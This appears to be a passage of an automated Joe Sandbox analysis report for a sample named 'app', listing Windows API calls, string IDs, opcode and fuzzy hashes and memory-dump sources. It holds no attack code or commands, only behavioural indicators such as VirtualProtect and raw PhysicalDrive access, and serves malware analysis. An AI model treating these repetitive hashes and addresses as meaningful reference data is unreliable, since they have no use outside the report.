                                                                                                                                              • Instruction Fuzzy Hash: 4001FB7060020DEBCF10DF60ED4AEDA77B9AB04318F808071B915D6190DB749A4A9B94
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257B173
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257B50E
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap
                                                                                                                                              • String ID: ://$ptth$qtth
                                                                                                                                              • API String ID: 3298025750-2468130592
                                                                                                                                              • Opcode ID: c548b7b91631d0245953ed493d751a32aeb56227ca8255df533831450b0c894a
                                                                                                                                              • Instruction ID: a244649d1debb81b000e5667021a160e3f0b9cb55b629e1690b9bfc2f263ad0b
                                                                                                                                              • Opcode Fuzzy Hash: c548b7b91631d0245953ed493d751a32aeb56227ca8255df533831450b0c894a
                                                                                                                                              • Instruction Fuzzy Hash: 2FF1A271A483029FD714CF28D48062AFBE2BFC4718F158A2EE4999B391D771DD45CB8A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0041E937
                                                                                                                                              • GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 0041E948
                                                                                                                                              • VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 0041E98E
                                                                                                                                              • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,0000001C), ref: 0041E9BD
                                                                                                                                              • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,0000001C), ref: 0041E9E0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Virtual$Query$AllocInfoProtectSystem
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4136887677-0
                                                                                                                                              • Opcode ID: ff6dd850e0057acba23b8827cf18eb4f3ead2c0418c749c99c268d3db089d540
                                                                                                                                              • Instruction ID: 32a2ad3af116692e63516f6cd1c830bccfaa7a2d380c1cd808f7f1f6e83c7fb5
                                                                                                                                              • Opcode Fuzzy Hash: ff6dd850e0057acba23b8827cf18eb4f3ead2c0418c749c99c268d3db089d540
                                                                                                                                              • Instruction Fuzzy Hash: 0A21E7B6B10209EBDB20CBB5DC45FFE77B8EB08345F540076EA02E3281D6789D858798
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0041C88D
                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 0041C899
                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0041C8A1
                                                                                                                                              • GetTickCount.KERNEL32 ref: 0041C8A9
                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 0041C8B5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1445889803-0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • CreateFileA.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 00409F80
                                                                                                                                              • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00002710,?,00000000), ref: 00409FD6
                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040A044
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                              • String ID: \\.\PhysicalDrive%d
                                                                                                                                              • API String ID: 33631002-2935326385
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A585A
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A588B
                                                                                                                                              Strings
                                                                                                                                              • assertion failed: secondary_table_len <= 0x7ff, xrefs: 025A5C5C
                                                                                                                                              • Invalid, xrefs: 025A5C48
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap
                                                                                                                                              • String ID: Invalid$assertion failed: secondary_table_len <= 0x7ff
                                                                                                                                              • API String ID: 3298025750-1198909562
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: E$G$_$_${invalid syntax}{recursion limit reached}?'for<> , ::{closureshim# as mut const ; dyn + unsafe extern "
                                                                                                                                              • API String ID: 0-1976165044
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 02572678: HeapFree.KERNEL32(00000000,?,025812D5), ref: 0257269A
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02581587
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,025BC142), ref: 02581775
                                                                                                                                              Strings
                                                                                                                                              • `async fn` resumed after completion, xrefs: 025816EA, 025816FE
                                                                                                                                              • assertion failed: prev/registry\src\index.crates.io-1cd66030c949c28d\futures-util-0.3.30\src\stream\futures_unordered\mod.rs, xrefs: 025816D1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap
                                                                                                                                              • String ID: `async fn` resumed after completion$assertion failed: prev/registry\src\index.crates.io-1cd66030c949c28d\futures-util-0.3.30\src\stream\futures_unordered\mod.rs
                                                                                                                                              • API String ID: 3298025750-1060740151
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0042663C: GetWindowLongA.USER32(?,000000F0), ref: 00426648
                                                                                                                                              • GetKeyState.USER32(00000010), ref: 00424B5C
                                                                                                                                              • GetKeyState.USER32(00000011), ref: 00424B65
                                                                                                                                              • GetKeyState.USER32(00000012), ref: 00424B6E
                                                                                                                                              • SendMessageA.USER32(?,00000111,0000E146,00000000), ref: 00424B84
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: State$LongMessageSendWindow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1063413437-0
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • EnableWindow.USER32(00000000,00000001), ref: 0042312C
                                                                                                                                              • GetActiveWindow.USER32 ref: 00423137
                                                                                                                                              • SetActiveWindow.USER32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00423145
                                                                                                                                              • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00423161
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$Active$EnableFreeResource
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3751187028-0
                                                                                                                                              • Opcode ID: cf1dc8f164079878ce4882cf31a04c95128d9af479deed743c0b8a2d04076335
                                                                                                                                              • Instruction ID: ca44568af34e6e7f10c41bee158ea285ab5cab5ae77f8efcc955b62aa56a5184
                                                                                                                                              • Opcode Fuzzy Hash: cf1dc8f164079878ce4882cf31a04c95128d9af479deed743c0b8a2d04076335
                                                                                                                                              • Instruction Fuzzy Hash: C2F0AF35B00655CFCF20EFA4E9455AEBBB1FF08712F90457AE142B22A0C7795E06CE08
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,025DE1E8,02613D44), ref: 025DE0CD
                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(025DE1E8,?,025DE1E8,02613D44), ref: 025DE0D6
                                                                                                                                              • GetCurrentProcess.KERNEL32(C0000409,?,025DE1E8,02613D44), ref: 025DE0E1
                                                                                                                                              • TerminateProcess.KERNEL32(00000000,?,025DE1E8,02613D44), ref: 025DE0E8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3231755760-0
                                                                                                                                              • Opcode ID: 3294e27e112322ae897c0baf94352aa68a3838cb2f4b0b047ace22c56050d541
                                                                                                                                              • Instruction ID: e4dc0cd84a24f916026241bb3045911045fb576f6df082518c63e6b1b8fb9303
                                                                                                                                              • Opcode Fuzzy Hash: 3294e27e112322ae897c0baf94352aa68a3838cb2f4b0b047ace22c56050d541
                                                                                                                                              • Instruction Fuzzy Hash: F2D002B2885204FFDA802FE1E80DE597F2DEB09756F018810FB09C5451DB715465AF6D
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 150943dc08c0167bc979cefcd71375d35153985db1d35b0f95c289b28cd95639
                                                                                                                                              • Instruction ID: 9fb67a88a75419fde22a6fe78b171526936af48b614b9b5a9a44be6ca3831610
                                                                                                                                              • Opcode Fuzzy Hash: 150943dc08c0167bc979cefcd71375d35153985db1d35b0f95c289b28cd95639
                                                                                                                                              • Instruction Fuzzy Hash: C6F03631900149ABDF116FA1CD4496F3B79AF05348F848036FD19A50A0D739D61FDB59
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • AcquireSRWLockExclusive.KERNEL32(?,00000001,00000000,?,?,025D8053,00000000,026117FC,?,?,?,?,?,?,?,?), ref: 025D6335
                                                                                                                                              Strings
                                                                                                                                              • RNG seed generator is internally corrupt/registry\src\index.crates.io-1cd66030c949c28d\tokio-1.37.0\src\util\rand\rt.rs, xrefs: 025D63B3
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AcquireExclusiveLock
                                                                                                                                              • String ID: RNG seed generator is internally corrupt/registry\src\index.crates.io-1cd66030c949c28d\tokio-1.37.0\src\util\rand\rt.rs
                                                                                                                                              • API String ID: 4021432409-4259227343
                                                                                                                                              • Opcode ID: 397d4fcfe63ca4ddd902b7bfb1dce5bf7ec1e17bf55d05cc9cd0ebbf50ef03b9
                                                                                                                                              • Instruction ID: e77f761cd59d825945d67d7507ad36fcf4539c261ba9d1fcf5172866716ae819
                                                                                                                                              • Opcode Fuzzy Hash: 397d4fcfe63ca4ddd902b7bfb1dce5bf7ec1e17bf55d05cc9cd0ebbf50ef03b9
                                                                                                                                              • Instruction Fuzzy Hash: 1D1148723047121B936CAD6AAC4142BB78BEBC4221318C63EDD6A83784C9B0B80BD3C4
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025ED82B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3298025750-0
                                                                                                                                              • Opcode ID: 7430a8806362831550e67dd656cdd3c1a737dd2b20cea620a94fb6bf618db543
                                                                                                                                              • Instruction ID: a4a8ccdc321e0135de171f4120c7ce2549ec265cd233c50ba5260961123efd03
                                                                                                                                              • Opcode Fuzzy Hash: 7430a8806362831550e67dd656cdd3c1a737dd2b20cea620a94fb6bf618db543
                                                                                                                                              • Instruction Fuzzy Hash: E122F471A097468BDB19CF2CC48056AFBF2BFC8304F188A2DE99A97351E731D945CB85
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetThreadLocale.KERNEL32 ref: 00401006
                                                                                                                                              • GetLocaleInfoA.KERNEL32(00000000,00001004,00000007,00000007), ref: 00401019
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Locale$InfoThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4232894706-0
                                                                                                                                              • Opcode ID: 1bfd077805e0b76a4cd0a89f1b1b1ebcb8d6ab1a177264c64a3ab03ef4350e1d
                                                                                                                                              • Instruction ID: dbec01051d8a6e41623a92cbe54c504c300f99dd774cbdae9b06207f921894f7
                                                                                                                                              • Opcode Fuzzy Hash: 1bfd077805e0b76a4cd0a89f1b1b1ebcb8d6ab1a177264c64a3ab03ef4350e1d
                                                                                                                                              • Instruction Fuzzy Hash: 29F0E93660536097CA218F14DC407E737246F01B81F8001BDEDC5A72A1E639584F86B9
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 0000$attempt to divide by zero
                                                                                                                                              • API String ID: 0-2494717124
                                                                                                                                              • Opcode ID: 0cad660c0c1fbe2755e573ced41b02f0711ecc42a0d3bceca2abc1d14c555ce7
                                                                                                                                              • Instruction ID: 9da0a723811b3ff3984ffba6982eb93b87d7e308ffbf025e97ab45d2e57ceaed
                                                                                                                                              • Opcode Fuzzy Hash: 0cad660c0c1fbe2755e573ced41b02f0711ecc42a0d3bceca2abc1d14c555ce7
                                                                                                                                              • Instruction Fuzzy Hash: DBF147B4A083419FD708CF19C4A466ABBE2FFD8354F54C92EE49AAB351D730D845CB4A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 0
                                                                                                                                              • API String ID: 0-4108050209
                                                                                                                                              • Opcode ID: 6e12085c91d98f2496f3240a5fa84f917683bfd7915eecf5a36aaaec95f5d5b0
                                                                                                                                              • Instruction ID: 8f72e5d40509f8cecb0b844fc2ba54b400947ee985e677df0f2cd9a9c27687f1
                                                                                                                                              • Opcode Fuzzy Hash: 6e12085c91d98f2496f3240a5fa84f917683bfd7915eecf5a36aaaec95f5d5b0
                                                                                                                                              • Instruction Fuzzy Hash: CBF27471E102099FCF08DFA5C992AEEB7F2FF88308F18446AD516B7241D738AA51DB54
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Strings
                                                                                                                                              • Invalid, xrefs: 02562A18
                                                                                                                                              • 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899, xrefs: 0256297D, 02562995, 025629C7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899$Invalid
                                                                                                                                              • API String ID: 0-3863875730
                                                                                                                                              • Opcode ID: 49e9c58ea4fa8f4e2eed81fba4eaa1cd821059ed064379e7a27249be80ba6442
                                                                                                                                              • Instruction ID: 8329f36c3ad896fbddf4f99fbf4422dbe04bb97ab33587e6871cacff943a2576
                                                                                                                                              • Opcode Fuzzy Hash: 49e9c58ea4fa8f4e2eed81fba4eaa1cd821059ed064379e7a27249be80ba6442
                                                                                                                                              • Instruction Fuzzy Hash: 9AA13432B083154BD7189E2DC89833ABBD6FBC4314F19863EE89ACB3D1D6759845CB85
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Strings
                                                                                                                                              • attempted to use a condition variable with more than one mutex/registry\src\index.crates.io-1cd66030c949c28d\parking_lot-0.12.1\src\condvar.rs, xrefs: 025AB81B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Value$PerformanceQuery$CounterFrequency
                                                                                                                                              • String ID: attempted to use a condition variable with more than one mutex/registry\src\index.crates.io-1cd66030c949c28d\parking_lot-0.12.1\src\condvar.rs
                                                                                                                                              • API String ID: 1966996841-1284212713
                                                                                                                                              • Opcode ID: 9980fec389cb0dc9424b767e0e3e07ccd9c1c45cdbc3164d284e44b303bfce26
                                                                                                                                              • Instruction ID: ec16d344ae116e9ffb2c3860c7bd69458fb606b978e24213f21b237ecedfcdc6
                                                                                                                                              • Opcode Fuzzy Hash: 9980fec389cb0dc9424b767e0e3e07ccd9c1c45cdbc3164d284e44b303bfce26
                                                                                                                                              • Instruction Fuzzy Hash: C91251716043029FDB18DF29C4A162EBBE2BFD8358F14892DE48ACB251DB74DC41CB95
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 4
                                                                                                                                              • API String ID: 0-4088798008
                                                                                                                                              • Opcode ID: 105ff6f28f0176ece59784b586960affd2c75ef0e9dd6e2caeb7df49e7281d12
                                                                                                                                              • Instruction ID: ce7be91b107c05d89f27200de5f74fd8ff5e1e004aeb1bf758a9aa92edd98eb5
                                                                                                                                              • Opcode Fuzzy Hash: 105ff6f28f0176ece59784b586960affd2c75ef0e9dd6e2caeb7df49e7281d12
                                                                                                                                              • Instruction Fuzzy Hash: EC129D71D00209AFCF15DF94D940AEEBBB1FF48314F24819AE815AB291C7B9DE52CB64
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025EE5EC
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3298025750-0
                                                                                                                                              • Opcode ID: bd6d15d3c112f7aed241c7520e8de3130531d026a2673d0d3d113c8f5bebbe69
                                                                                                                                              • Instruction ID: a80389b80d889ca5dfb4c1ac2ae69397eb25a02411671864979792568ad20868
                                                                                                                                              • Opcode Fuzzy Hash: bd6d15d3c112f7aed241c7520e8de3130531d026a2673d0d3d113c8f5bebbe69
                                                                                                                                              • Instruction Fuzzy Hash: 43D1F571A183568FDB19CF6CC48166EBBE2BFC9310F088A2DE89697351EB30D944CB45
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025EEA73
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3298025750-0
                                                                                                                                              • Opcode ID: 9b06a60df97658b9719d57fab09231d4995e181083737e023bc2a3f49aa2be01
                                                                                                                                              • Instruction ID: eb6d85d9a8ab4128564e3921bffb47099159b77b7062c43ffde9fa951e8d46dc
                                                                                                                                              • Opcode Fuzzy Hash: 9b06a60df97658b9719d57fab09231d4995e181083737e023bc2a3f49aa2be01
                                                                                                                                              • Instruction Fuzzy Hash: 65E11271A087428FDB19CF2CC48156AFBE2BFC9314F088A6DE89697351EB30D945CB85
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • HeapFree.KERNEL32(00000000,02562930), ref: 025F180A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3298025750-0
                                                                                                                                              • Opcode ID: 629fb5bcfe303d8ce8b4ba39cae90bac15bdd8ae97434efe2f10bd83f4bce6ce
                                                                                                                                              • Instruction ID: ea00b9e3491d974b9399796a303d0e9a1edddd3fd02a8aac17712bf6f50b7e9e
                                                                                                                                              • Opcode Fuzzy Hash: 629fb5bcfe303d8ce8b4ba39cae90bac15bdd8ae97434efe2f10bd83f4bce6ce
                                                                                                                                              • Instruction Fuzzy Hash: 6ED1C231A08B428FD725CF2CC49052AFBE1BFC9214F188A6DE9DA97351EB70D844CB46
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetLocaleInfoA.KERNEL32(?,00001004,00000100,00000006,00000100,?,00000000), ref: 0041E728
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmp
